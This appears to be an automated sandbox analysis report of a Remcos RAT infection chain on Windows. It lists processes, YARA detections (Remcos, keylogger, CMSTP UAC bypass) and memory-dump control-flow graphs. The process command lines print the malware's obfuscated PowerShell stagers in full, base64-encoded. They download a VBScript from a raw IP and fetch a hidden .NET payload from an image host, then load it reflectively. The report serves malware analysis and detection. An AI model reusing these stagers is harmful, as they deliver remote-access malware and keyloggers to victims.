                                                                                          Commandline:pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                                                                                          Imagebase:0x440000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:03:45:12
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline"
                                                                                          Imagebase:0x6b0000
                                                                                          File size:2'141'552 bytes
                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:03:45:12
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0F9.tmp" "c:\Users\user\AppData\Local\Temp\eykjjr5p\CSC29E03D134814371801318532EC93FB.TMP"
                                                                                          Imagebase:0xf60000
                                                                                          File size:46'832 bytes
                                                                                          MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:03:45:18
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
                                                                                          Imagebase:0xc0000
                                                                                          File size:147'456 bytes
                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:03:45:18
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
                                                                                          Imagebase:0x440000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:9
                                                                                          Start time:03:45:18
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6ee680000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:11
                                                                                          Start time:03:45:48
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                          Imagebase:0x80000
                                                                                          File size:108'664 bytes
                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:12
                                                                                          Start time:03:45:48
                                                                                          Start date:17/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                          Imagebase:0xad0000
                                                                                          File size:108'664 bytes
                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3843532128.0000000002DBE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Has exited:false

                                                                                          Reset < >
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.1400120257.0000000006F10000.00000010.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_6f10000_mshta.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3af9464428e29db59b544359c1d98a9fcaea4caa32fef28c4eca05f848acd9e
                                                                                            • Instruction ID: ae376a10260099352ad05415480556d03d61158f5954515614d4254712f49b68
                                                                                            • Opcode Fuzzy Hash: a3af9464428e29db59b544359c1d98a9fcaea4caa32fef28c4eca05f848acd9e
                                                                                            • Instruction Fuzzy Hash: 58018871E403059FD751DFAC8C92BEE7BF5AF49350F580469E605FB241DA748942C790
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.1400144911.0000000006B30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_6b30000_mshta.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                            • Instruction ID: e453a11427cbf36cbd084acc69d02e5dfeacf3a34d9b90ffe6405ef632085449
                                                                                            • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.1400144911.0000000006B30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_6b30000_mshta.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                            • Instruction ID: e453a11427cbf36cbd084acc69d02e5dfeacf3a34d9b90ffe6405ef632085449
                                                                                            • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.1400144911.0000000006B30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_6b30000_mshta.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                            • Instruction ID: e453a11427cbf36cbd084acc69d02e5dfeacf3a34d9b90ffe6405ef632085449
                                                                                            • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.1400144911.0000000006B30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_6b30000_mshta.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                            • Instruction ID: e453a11427cbf36cbd084acc69d02e5dfeacf3a34d9b90ffe6405ef632085449
                                                                                            • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                            • Instruction Fuzzy Hash:

                                                                                            Execution Graph

                                                                                            Execution Coverage:3.6%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:47
                                                                                            Total number of Limit Nodes:7
                                                                                            execution_graph 9854 4847480 9855 48475fe 9854->9855 9856 48474be 9854->9856 9856->9855 9862 4847c45 9856->9862 9870 4847a18 9856->9870 9879 4847a08 9856->9879 9888 4847da8 9856->9888 9857 48475df 9864 4847b9a 9862->9864 9867 4847c5e 9862->9867 9863 4847de8 URLDownloadToFileW 9866 4847ea8 9863->9866 9864->9862 9864->9863 9866->9857 9892 73745f4 9867->9892 9900 7374610 9867->9900 9875 4847a4c 9870->9875 9871 4847de8 URLDownloadToFileW 9874 4847ea8 9871->9874 9872 4847b30 9872->9857 9874->9857 9875->9871 9875->9872 9876 4847c5e 9875->9876 9877 73745f4 3 API calls 9876->9877 9878 7374610 3 API calls 9876->9878 9877->9876 9878->9876 9884 4847a18 9879->9884 9880 4847de8 URLDownloadToFileW 9883 4847ea8 9880->9883 9881 4847b30 9881->9857 9883->9857 9884->9880 9884->9881 9885 4847c5e 9884->9885 9886 73745f4 3 API calls 9885->9886 9887 7374610 3 API calls 9885->9887 9886->9885 9887->9885 9889 4847cf9 9888->9889 9889->9888 9890 73745f4 4 API calls 9889->9890 9891 7374610 4 API calls 9889->9891 9890->9889 9891->9889 9894 7374610 9892->9894 9893 7374a93 9893->9867 9894->9893 9896 4847c45 4 API calls 9894->9896 9897 4847a08 4 API calls 9894->9897 9898 4847a18 4 API calls 9894->9898 9908 4841bf8 9894->9908 9895 7374a34 9895->9867 9896->9895 9897->9895 9898->9895 9901 7374a93 9900->9901 9902 7374641 9900->9902 9901->9867 9902->9901 9904 4847c45 4 API calls 9902->9904 9905 4847a08 4 API calls 9902->9905 9906 4847a18 4 API calls 9902->9906 9907 4841bf8 URLDownloadToFileW 9902->9907 9903 7374a34 9903->9867 9904->9903 9905->9903 9906->9903 9907->9903 9909 4847e00 URLDownloadToFileW 9908->9909 9911 4847ea8 9909->9911 9911->9895

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 291 4847a18-4847a4a 292 4847a90 291->292 293 4847a4c-4847a53 291->293 296 4847a93-4847acf 292->296 294 4847a64 293->294 295 4847a55-4847a62 293->295 297 4847a66-4847a68 294->297 295->297 305 4847ad5-4847ade 296->305 306 4847b58-4847b63 296->306 299 4847a6f-4847a71 297->299 300 4847a6a-4847a6d 297->300 302 4847a82 299->302 303 4847a73-4847a80 299->303 304 4847a8e 300->304 307 4847a84-4847a86 302->307 303->307 304->296 305->306 308 4847ae0-4847ae6 305->308 309 4847b65-4847b68 306->309 310 4847b72-4847b94 306->310 307->304 312 4847aec-4847af9 308->312 313 4847de8-4847e52 308->313 309->310 317 4847c5e-4847cf6 310->317 318 4847b9a-4847ba3 310->318 315 4847b4f-4847b56 312->315 316 4847afb-4847b2e 312->316 329 4847e54-4847e5a 313->329 330 4847e5d-4847e63 313->330 315->306 315->308 327 4847b30-4847b33 316->327 328 4847b4b 316->328 356 4847cf9-4847d52 317->356 318->313 322 4847ba9-4847be7 318->322 340 4847c01-4847c14 322->340 341 4847be9-4847bff 322->341 332 4847b35-4847b38 327->332 333 4847b3f-4847b48 327->333 328->315 329->330 334 4847e65-4847e6e 330->334 335 4847e71-4847ea6 URLDownloadToFileW 330->335 332->333 334->335 337 4847eaf-4847ec3 335->337 338 4847ea8-4847eae 335->338 338->337 342 4847c16-4847c1d 340->342 341->342 345 4847c42-4847c58 342->345 346 4847c1f-4847c30 342->346 345->317 345->318 346->345 350 4847c32-4847c3b 346->350 350->345 369 4847d55 call 73745f4 356->369 370 4847d55 call 7374610 356->370 361 4847d57-4847d60 362 4847d62-4847d78 361->362 363 4847d7a-4847d8d 361->363 364 4847d8f-4847d96 362->364 363->364 365 4847da5-4847daf 364->365 366 4847d98-4847d9e 364->366 365->356 366->365 369->361 370->361
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1506712227.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_4840000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5344d669da4e4f866254e1e0e6ed785b2098110e88f35bfabbe7b8c32f93556d
                                                                                            • Instruction ID: 55c304653c62fe9367a75cddd0d568a805cd508d1e2386a77f7ca73c40cf3068
                                                                                            • Opcode Fuzzy Hash: 5344d669da4e4f866254e1e0e6ed785b2098110e88f35bfabbe7b8c32f93556d
                                                                                            • Instruction Fuzzy Hash: 4BE10775A0021DEFDB05DF98D484A9EFBB2FF88314F248569E805AB365C735AD81CB90

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 7374610-737463b 1 7374af2-7374b25 0->1 2 7374641-7374646 0->2 10 7374b27-7374b33 1->10 11 7374b35 1->11 3 737465e-7374663 2->3 4 7374648-737464e 2->4 5 7374665-7374671 3->5 6 7374673 3->6 7 7374652-737465c 4->7 8 7374650 4->8 12 7374675-7374677 5->12 6->12 7->3 8->3 13 7374b37-7374b39 10->13 11->13 14 7374a93-7374a9d 12->14 15 737467d-7374687 12->15 19 7374b7b-7374b85 13->19 20 7374b3b-7374b42 13->20 17 7374a9f-7374aa8 14->17 18 7374aab-7374ab1 14->18 15->1 21 737468d-7374692 15->21 22 7374ab7-7374ac3 18->22 23 7374ab3-7374ab5 18->23 27 7374b87-7374b8b 19->27 28 7374b8e-7374b94 19->28 20->19 24 7374b44-7374b61 20->24 25 7374694-737469a 21->25 26 73746aa-73746b8 21->26 29 7374ac5-7374aef 22->29 23->29 38 7374b63-7374b75 24->38 39 7374bc9-7374bce 24->39 30 737469e-73746a8 25->30 31 737469c 25->31 26->14 42 73746be-73746dd 26->42 32 7374b96-7374b98 28->32 33 7374b9a-7374ba6 28->33 30->26 31->26 37 7374ba8-7374bc6 32->37 33->37 38->19 39->38 42->14 50 73746e3-73746ed 42->50 50->1 51 73746f3-73746f8 50->51 52 7374710-7374714 51->52 53 73746fa-7374700 51->53 52->14 56 737471a-737471e 52->56 54 7374704-737470e 53->54 55 7374702 53->55 54->52 55->52 56->14 57 7374724-7374728 56->57 57->14 59 737472e-737473e 57->59 60 73747c6-7374815 59->60 61 7374744-737476b 59->61 78 737481c-737482f 60->78 66 7374785-73747b3 61->66 67 737476d-7374773 61->67 76 73747b5-73747b7 66->76 77 73747c1-73747c4 66->77 68 7374777-7374783 67->68 69 7374775 67->69 68->66 69->66 76->77 77->78 79 73748b7-7374906 78->79 80 7374835-737485c 78->80 97 737490d-7374920 79->97 85 7374876-73748a4 80->85 86 737485e-7374864 80->86 95 73748a6-73748a8 85->95 96 73748b2-73748b5 85->96 87 7374866 86->87 88 7374868-7374874 86->88 87->85 88->85 95->96 96->97 98 7374926-737494d 97->98 99 73749a8-73749f7 97->99 104 7374967-7374995 98->104 105 737494f-7374955 98->105 116 73749fe-7374a2c 99->116 114 7374997-7374999 104->114 115 73749a3-73749a6 104->115 106 7374957 105->106 107 7374959-7374965 105->107 106->104 107->104 114->115 115->116 121 7374a2f call 4847c45 116->121 122 7374a2f call 4847a08 116->122 123 7374a2f call 4847a18 116->123 124 7374a2f call 4841bf8 116->124 119 7374a34-7374a90 121->119 122->119 123->119 124->119
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1512100734.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_7370000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84i$84i$84i$84i$84i$84i
                                                                                            • API String ID: 0-3608691829
                                                                                            • Opcode ID: 57771659438ef3c1cdfa31f98922ab83351337458a103b4f7fc138f6364b7047
                                                                                            • Instruction ID: 8aa033fd6669b4f10dbd055296c35905705a8b40f97d299ce660863fb471f1e4
                                                                                            • Opcode Fuzzy Hash: 57771659438ef3c1cdfa31f98922ab83351337458a103b4f7fc138f6364b7047
                                                                                            • Instruction Fuzzy Hash: F2F116B1B003459FEB249B68C410B6EBBE6EFC9710F24846AE80A9F350DB75ED41C791

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 125 73745f4-737463b 127 7374af2-7374b25 125->127 128 7374641-7374646 125->128 136 7374b27-7374b33 127->136 137 7374b35 127->137 129 737465e-7374663 128->129 130 7374648-737464e 128->130 131 7374665-7374671 129->131 132 7374673 129->132 133 7374652-737465c 130->133 134 7374650 130->134 138 7374675-7374677 131->138 132->138 133->129 134->129 139 7374b37-7374b39 136->139 137->139 140 7374a93-7374a9d 138->140 141 737467d-7374687 138->141 145 7374b7b-7374b85 139->145 146 7374b3b-7374b42 139->146 143 7374a9f-7374aa8 140->143 144 7374aab-7374ab1 140->144 141->127 147 737468d-7374692 141->147 148 7374ab7-7374ac3 144->148 149 7374ab3-7374ab5 144->149 153 7374b87-7374b8b 145->153 154 7374b8e-7374b94 145->154 146->145 150 7374b44-7374b61 146->150 151 7374694-737469a 147->151 152 73746aa-73746b8 147->152 155 7374ac5-7374aef 148->155 149->155 164 7374b63-7374b75 150->164 165 7374bc9-7374bce 150->165 156 737469e-73746a8 151->156 157 737469c 151->157 152->140 168 73746be-73746dd 152->168 158 7374b96-7374b98 154->158 159 7374b9a-7374ba6 154->159 156->152 157->152 163 7374ba8-7374bc6 158->163 159->163 164->145 165->164 168->140 176 73746e3-73746ed 168->176 176->127 177 73746f3-73746f8 176->177 178 7374710-7374714 177->178 179 73746fa-7374700 177->179 178->140 182 737471a-737471e 178->182 180 7374704-737470e 179->180 181 7374702 179->181 180->178 181->178 182->140 183 7374724-7374728 182->183 183->140 185 737472e-737473e 183->185 186 73747c6-7374815 185->186 187 7374744-737476b 185->187 204 737481c-737482f 186->204 192 7374785-73747b3 187->192 193 737476d-7374773 187->193 202 73747b5-73747b7 192->202 203 73747c1-73747c4 192->203 194 7374777-7374783 193->194 195 7374775 193->195 194->192 195->192 202->203 203->204 205 73748b7-7374906 204->205 206 7374835-737485c 204->206 223 737490d-7374920 205->223 211 7374876-73748a4 206->211 212 737485e-7374864 206->212 221 73748a6-73748a8 211->221 222 73748b2-73748b5 211->222 213 7374866 212->213 214 7374868-7374874 212->214 213->211 214->211 221->222 222->223 224 7374926-737494d 223->224 225 73749a8-73749f7 223->225 230 7374967-7374995 224->230 231 737494f-7374955 224->231 242 73749fe-7374a2c 225->242 240 7374997-7374999 230->240 241 73749a3-73749a6 230->241 232 7374957 231->232 233 7374959-7374965 231->233 232->230 233->230 240->241 241->242 247 7374a2f call 4847c45 242->247 248 7374a2f call 4847a08 242->248 249 7374a2f call 4847a18 242->249 250 7374a2f call 4841bf8 242->250 245 7374a34-7374a90 247->245 248->245 249->245 250->245
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1512100734.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_7370000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84i$84i$84i
                                                                                            • API String ID: 0-1595485978
                                                                                            • Opcode ID: 5bb17fb71e56f1246cfda272d05d6209676067d1a4c44105c9b0b179245622f7
                                                                                            • Instruction ID: ce12112407f06d109638b7a80b9bcce24a8d9d0778f8c6e70bc0492254fbe58a
                                                                                            • Opcode Fuzzy Hash: 5bb17fb71e56f1246cfda272d05d6209676067d1a4c44105c9b0b179245622f7
                                                                                            • Instruction Fuzzy Hash: A091A1F0B003859BEB24CF58C550B69B7B6EF89310F25845AE8199B350D776ED81CB91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
